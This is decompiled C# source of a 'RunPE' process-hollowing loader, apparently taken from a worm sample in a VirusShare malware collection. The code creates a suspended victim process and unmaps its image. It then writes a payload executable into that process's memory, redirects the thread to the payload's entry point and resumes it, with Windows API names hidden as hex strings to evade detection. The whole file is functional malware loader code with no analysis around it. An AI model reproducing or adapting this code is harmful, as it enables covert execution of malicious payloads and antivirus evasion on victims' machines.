// Decompiled with JetBrains decompiler // Type: BCV5StuB.RunPE // Assembly: Windows, Version=7.8.9.10, Culture=neutral, PublicKeyToken=null // MVID: 9F0D14B2-64CD-49F4-8243-2271113E9FED // Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.Win32.AutoRun.hgi-f7f655882362e3de6b26b28c84c129a11a52fb9cd813ce2911fb258b72766e44.exe using Microsoft.VisualBasic; using Microsoft.VisualBasic.CompilerServices; using System; using System.Diagnostics; using System.IO; using System.Runtime.InteropServices; namespace BCV5StuB { public sealed class RunPE : NativeDllCalls { private const int CONTEXT_X86 = 65536; private const int CONTEXT86_INTEGER = 65538; private const long MEM_COMMIT = 4096; private const long MEM_RESERVE = 8192; private const long PAGE_EXECUTE_READWRITE = 64; private const long PAGE_EXECUTE_READ = 32; private const long PAGE_EXECUTE = 16; private const long PAGE_NOACCESS = 1; private const long PAGE_READWRITE = 4; private const uint PAGE_READONLY = 2; private const string KERNEL32HEX = "0x6b65726e656c3332"; private const string NTDLLHEX = "0x6e74646c6c"; [DebuggerNonUserCode] public RunPE() { } private long Protect(long characteristics) => Conversions.ToLong(new object[8] { (object) 1L, (object) 16L, (object) 2U, (object) 32L, (object) 4L, (object) 64L, (object) 4L, (object) 64L }[checked ((int) this.RShift(characteristics, 29L))]); private long RShift(long lValue, long lNumberOfBitsToShift) => checked ((long) Math.Round(unchecked (this.vbLongToULong(lValue) / Math.Pow(2.0, (double) lNumberOfBitsToShift)))); private double vbLongToULong(long Value) => Value < 0L ? (double) Value + 4294967296.0 : (double) Value; public bool SRexec(string sExePath, string sVictim) { bool flag; return File.Exists(sExePath) ? this.SRexec(File.ReadAllBytes(sExePath), sVictim) : flag; } public bool SRexec(byte[] b, string sVictim) { RunPE.IMAGE_DOS_HEADER imageDosHeader1 = new RunPE.IMAGE_DOS_HEADER(); RunPE.CONTEXT lpContext = new RunPE.CONTEXT(); RunPE.IMAGE_NT_HEADERS imageNtHeaders1 = new RunPE.IMAGE_NT_HEADERS(); RunPE.IMAGE_SECTION_HEADER imageSectionHeader1 = new RunPE.IMAGE_SECTION_HEADER(); RunPE.PROCESS_INFORMATION lpProcessInformation = new RunPE.PROCESS_INFORMATION(); RunPE.STARTUPINFO lpStartupInfo = new RunPE.STARTUPINFO(); RunPE.SECURITY_ATTRIBUTES lpProcessAttributes = new RunPE.SECURITY_ATTRIBUTES(); RunPE.SECURITY_ATTRIBUTES lpThreadAttributes = new RunPE.SECURITY_ATTRIBUTES(); GCHandle gcHandle = GCHandle.Alloc((object) b, GCHandleType.Pinned); IntPtr ptr = gcHandle.AddrOfPinnedObject(); int int32 = ptr.ToInt32(); object structure1 = Marshal.PtrToStructure(gcHandle.AddrOfPinnedObject(), imageDosHeader1.GetType()); RunPE.IMAGE_DOS_HEADER imageDosHeader2; RunPE.IMAGE_DOS_HEADER imageDosHeader3 = structure1 != null ? (RunPE.IMAGE_DOS_HEADER) structure1 : imageDosHeader2; gcHandle.Free(); IntPtr lpEnvironment; if (!((RunPE.CreateProcessA) this.DynamicCall("0x6b65726e656c3332", "0x43726561746550726f6365737341", typeof (RunPE.CreateProcessA)))((string) null, sVictim, ref lpProcessAttributes, ref lpThreadAttributes, false, 4U, lpEnvironment, (string) null, ref lpStartupInfo, out lpProcessInformation)) return false; ptr = new IntPtr(checked (int32 + imageDosHeader3.e_lfanew)); object structure2 = Marshal.PtrToStructure(ptr, imageNtHeaders1.GetType()); RunPE.IMAGE_NT_HEADERS imageNtHeaders2; RunPE.IMAGE_NT_HEADERS imageNtHeaders3 = structure2 != null ? (RunPE.IMAGE_NT_HEADERS) structure2 : imageNtHeaders2; lpStartupInfo.cb = Strings.Len((object) lpStartupInfo); lpContext.ContextFlags = 65538U; if (imageNtHeaders3.Signature != 17744U | imageDosHeader3.e_magic != (ushort) 23117) return false; RunPE.GetThreadContext getThreadContext = (RunPE.GetThreadContext) this.DynamicCall("0x6b65726e656c3332", "0x476574546872656164436f6e74657874", typeof (RunPE.GetThreadContext)); RunPE.ReadProcessMemory readProcessMemory1 = (RunPE.ReadProcessMemory) this.DynamicCall("0x6b65726e656c3332", "0x5265616450726f636573734d656d6f7279", typeof (RunPE.ReadProcessMemory)); RunPE.ZwUnmapViewOfSection unmapViewOfSection = (RunPE.ZwUnmapViewOfSection) this.DynamicCall("0x6e74646c6c", "0x5a77556e6d6170566965774f6653656374696f6e", typeof (RunPE.ZwUnmapViewOfSection)); int num1 = getThreadContext(lpProcessInformation.hThread, ref lpContext) ? 1 : 0; RunPE.ReadProcessMemory readProcessMemory2 = readProcessMemory1; IntPtr hProcess1 = lpProcessInformation.hProcess; int lpBaseAddress1 = checked ((int) ((long) lpContext.Ebx + 8L)); long num2; ptr = (IntPtr) num2; ref IntPtr local1 = ref ptr; int num3 = 0; ref int local2 = ref num3; int num4 = readProcessMemory2(hProcess1, lpBaseAddress1, ref local1, 4, ref local2); long num5 = (long) ptr; int num6 = num4 >= 0 ? 1 : 0; if ((num1 & num6 & (unmapViewOfSection(lpProcessInformation.hProcess, (IntPtr) num5) >= 0L ? 1 : 0)) == 0) return false; uint num7 = checked ((uint) (int) ((RunPE.VirtualAllocEx) this.DynamicCall("0x6b65726e656c3332", "0x5669727475616c416c6c6f634578", typeof (RunPE.VirtualAllocEx)))(lpProcessInformation.hProcess, (IntPtr) (long) imageNtHeaders3.OptionalHeader.ImageBase, imageNtHeaders3.OptionalHeader.SizeOfImage, 12288U, 4U)); if (num7 == 0U) return false; RunPE.WriteProcessMemory writeProcessMemory1 = (RunPE.WriteProcessMemory) this.DynamicCall("0x6b65726e656c3332", "0x577269746550726f636573734d656d6f7279", typeof (RunPE.WriteProcessMemory)); IntPtr hProcess2 = lpProcessInformation.hProcess; IntPtr lpBaseAddress2 = (IntPtr) (long) num7; byte[] lpBuffer1 = b; int sizeOfHeaders = checked ((int) imageNtHeaders3.OptionalHeader.SizeOfHeaders); uint num8; int num9 = checked ((int) num8); ref int local3 = ref num9; int num10 = writeProcessMemory1(hProcess2, lpBaseAddress2, lpBuffer1, sizeOfHeaders, out local3) ? 1 : 0; uint num11 = checked ((uint) num9); long num12 = (long) checked (imageDosHeader3.e_lfanew + 248); int num13 = checked ((int) imageNtHeaders3.FileHeader.NumberOfSections - 1); int num14 = 0; while (num14 <= num13) { ptr = new IntPtr(checked ((long) int32 + num12 + (long) (num14 * 40))); object structure3 = Marshal.PtrToStructure(ptr, imageSectionHeader1.GetType()); RunPE.IMAGE_SECTION_HEADER imageSectionHeader2; imageSectionHeader1 = structure3 != null ? (RunPE.IMAGE_SECTION_HEADER) structure3 : imageSectionHeader2; byte[] numArray = new byte[checked ((int) imageSectionHeader1.SizeOfRawData + 1)]; int num15 = checked ((int) ((long) imageSectionHeader1.SizeOfRawData - 1L)); int index = 0; while (index <= num15) { numArray[index] = b[checked ((int) ((long) imageSectionHeader1.PointerToRawData + (long) index))]; checked { ++index; } } RunPE.WriteProcessMemory writeProcessMemory2 = (RunPE.WriteProcessMemory) this.DynamicCall("0x6b65726e656c3332", "0x577269746550726f636573734d656d6f7279", typeof (RunPE.WriteProcessMemory)); RunPE.VirtualProtectEx virtualProtectEx = (RunPE.VirtualProtectEx) this.DynamicCall("0x6b65726e656c3332", "0x5669727475616c50726f746563744578", typeof (RunPE.VirtualProtectEx)); RunPE.WriteProcessMemory writeProcessMemory3 = writeProcessMemory2; IntPtr hProcess3 = lpProcessInformation.hProcess; IntPtr lpBaseAddress3 = (IntPtr) (long) checked (num7 + imageSectionHeader1.VirtualAddress); byte[] lpBuffer2 = numArray; int sizeOfRawData = checked ((int) imageSectionHeader1.SizeOfRawData); num9 = checked ((int) num11); ref int local4 = ref num9; int num16 = writeProcessMemory3(hProcess3, lpBaseAddress3, lpBuffer2, sizeOfRawData, out local4) ? 1 : 0; num11 = checked ((uint) num9); int num17 = virtualProtectEx(lpProcessInformation.hProcess, (IntPtr) (long) checked (num7 + imageSectionHeader1.VirtualAddress), (UIntPtr) imageSectionHeader1.Misc.VirtualSize, (UIntPtr) checked ((ulong) this.Protect((long) imageSectionHeader1.Characteristics)), checked ((uint) num5)); checked { ++num14; } } byte[] bytes = BitConverter.GetBytes(num7); RunPE.WriteProcessMemory writeProcessMemory4 = (RunPE.WriteProcessMemory) this.DynamicCall("0x6b65726e656c3332", "0x577269746550726f636573734d656d6f7279", typeof (RunPE.WriteProcessMemory)); IntPtr hProcess4 = lpProcessInformation.hProcess; IntPtr lpBaseAddress4 = (IntPtr) checked ((long) lpContext.Ebx + 8L); byte[] lpBuffer3 = bytes; num9 = checked ((int) num11); ref int local5 = ref num9; int num18 = writeProcessMemory4(hProcess4, lpBaseAddress4, lpBuffer3, 4, out local5) ? 1 : 0; num8 = checked ((uint) num9); lpContext.Eax = checked (num7 + imageNtHeaders3.OptionalHeader.AddressOfEntryPoint); RunPE.SetThreadContext setThreadContext = (RunPE.SetThreadContext) this.DynamicCall("0x6b65726e656c3332", "0x536574546872656164436f6e74657874", typeof (RunPE.SetThreadContext)); RunPE.ResumeThread resumeThread = (RunPE.ResumeThread) this.DynamicCall("0x6b65726e656c3332", "0x526573756d65546872656164", typeof (RunPE.ResumeThread)); bool flag; return setThreadContext(lpProcessInformation.hThread, ref lpContext) ? resumeThread(lpProcessInformation.hThread) > 0U : flag; } [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] private struct STARTUPINFO { public int cb; public string lpReserved; public string lpDesktop; public string lpTitle; public int dwX; public int dwY; public int dwXSize; public int dwYSize; public int dwXCountChars; public int dwYCountChars; public int dwFillAttribute; public int dwFlags; public short wShowWindow; public short cbReserved2; public int lpReserved2; public int hStdInput; public int hStdOutput; public int hStdError; } private struct PROCESS_INFORMATION { public IntPtr hProcess; public IntPtr hThread; public int dwProcessId; public int dwThreadId; } private struct IMAGE_DOS_HEADER { public ushort e_magic; public ushort e_cblp; public ushort e_cp; public ushort e_crlc; public ushort e_cparhdr; public ushort e_minalloc; public ushort e_maxalloc; public ushort e_ss; public ushort e_sp; public ushort e_csum; public ushort e_ip; public ushort e_cs; public ushort e_lfarlc; public ushort e_ovno; [MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)] public ushort[] e_res1; public ushort e_oemid; public ushort e_oeminfo; [MarshalAs(UnmanagedType.ByValArray, SizeConst = 10)] public ushort[] e_res2; public int e_lfanew; } private struct SECURITY_ATTRIBUTES { public int nLength; public IntPtr lpSecurityDescriptor; public int bInheritHandle; } private struct FLOATING_SAVE_AREA { public uint ControlWord; public uint StatusWord; public uint TagWord; public uint ErrorOffset; public uint ErrorSelector; public uint DataOffset; public uint DataSelector; [MarshalAs(UnmanagedType.ByValArray, SizeConst = 80)] public byte[] RegisterArea; public uint Cr0NpxState; } private struct CONTEXT { public uint ContextFlags; public uint Dr0; public uint Dr1; public uint Dr2; public uint Dr3; public uint Dr6; public uint Dr7; public RunPE.FLOATING_SAVE_AREA FloatSave; public uint SegGs; public uint SegFs; public uint SegEs; public uint SegDs; public uint Edi; public uint Esi; public uint Ebx; public uint Edx; public uint Ecx; public uint Eax; public uint Ebp; public uint Eip; public uint SegCs; public uint EFlags; public uint Esp; public uint SegSs; [MarshalAs(UnmanagedType.ByValArray, SizeConst = 512)] public byte[] ExtendedRegisters; } private struct IMAGE_OPTIONAL_HEADER32 { public ushort Magic; public byte MajorLinkerVersion; public byte MinorLinkerVersion; public uint SizeOfCode; public uint SizeOfInitializedData; public uint SizeOfUninitializedData; public uint AddressOfEntryPoint; public uint BaseOfCode; public uint BaseOfData; public uint ImageBase; public uint SectionAlignment; public uint FileAlignment; public ushort MajorOperatingSystemVersion; public ushort MinorOperatingSystemVersion; public ushort MajorImageVersion; public ushort MinorImageVersion; public ushort MajorSubsystemVersion; public ushort MinorSubsystemVersion; public uint Win32VersionValue; public uint SizeOfImage; public uint SizeOfHeaders; public uint CheckSum; public ushort Subsystem; public ushort DllCharacteristics; public uint SizeOfStackReserve; public uint SizeOfStackCommit; public uint SizeOfHeapReserve; public uint SizeOfHeapCommit; public uint LoaderFlags; public uint NumberOfRvaAndSizes; [MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)] public RunPE.IMAGE_DATA_DIRECTORY[] DataDirectory; } private struct IMAGE_FILE_HEADER { public ushort Machine; public ushort NumberOfSections; public uint TimeDateStamp; public uint PointerToSymbolTable; public uint NumberOfSymbols; public ushort SizeOfOptionalHeader; public ushort Characteristics; } private struct IMAGE_DATA_DIRECTORY { public uint VirtualAddress; public uint Size; } private struct IMAGE_NT_HEADERS { public uint Signature; public RunPE.IMAGE_FILE_HEADER FileHeader; public RunPE.IMAGE_OPTIONAL_HEADER32 OptionalHeader; } private struct Misc { public uint PhysicalAddress; public uint VirtualSize; } private struct IMAGE_SECTION_HEADER { public byte Name; public RunPE.Misc Misc; public uint VirtualAddress; public uint SizeOfRawData; public uint PointerToRawData; public uint PointerToRelocations; public uint PointerToLinenumbers; public ushort NumberOfRelocations; public ushort NumberOfLinenumbers; public uint Characteristics; } private enum ImageSignatureTypes { IMAGE_OS2_SIGNATURE_LE = 17740, // 0x0000454C IMAGE_VXD_SIGNATURE = 17740, // 0x0000454C IMAGE_OS2_SIGNATURE = 17742, // 0x0000454E IMAGE_NT_SIGNATURE = 17744, // 0x00004550 IMAGE_DOS_SIGNATURE = 23117, // 0x00005A4D } private delegate uint ResumeThread(IntPtr hThread); private delegate bool GetThreadContext(IntPtr hThread, ref RunPE.CONTEXT lpContext); private delegate bool SetThreadContext(IntPtr hThread, ref RunPE.CONTEXT lpContext); private delegate bool CreateProcessA( string lpApplicationName, string lpCommandLine, ref RunPE.SECURITY_ATTRIBUTES lpProcessAttributes, ref RunPE.SECURITY_ATTRIBUTES lpThreadAttributes, bool bInheritHandles, uint dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, [In] ref RunPE.STARTUPINFO lpStartupInfo, out RunPE.PROCESS_INFORMATION lpProcessInformation); private delegate bool WriteProcessMemory( IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, int iSize, out int lpNumberOfBytesWritten); private delegate int ReadProcessMemory( IntPtr hProcess, int lpBaseAddress, ref IntPtr lpbuffer, int size, ref int lpNumberOfBytesRead); private delegate long ZwUnmapViewOfSection(IntPtr hProcess, IntPtr BaseAddress); private delegate IntPtr VirtualAllocEx( IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); private delegate int VirtualProtectEx( IntPtr hProcess, IntPtr lpAddress, UIntPtr dwSize, UIntPtr flNewProtect, [Out] uint lpflOldProtect); } }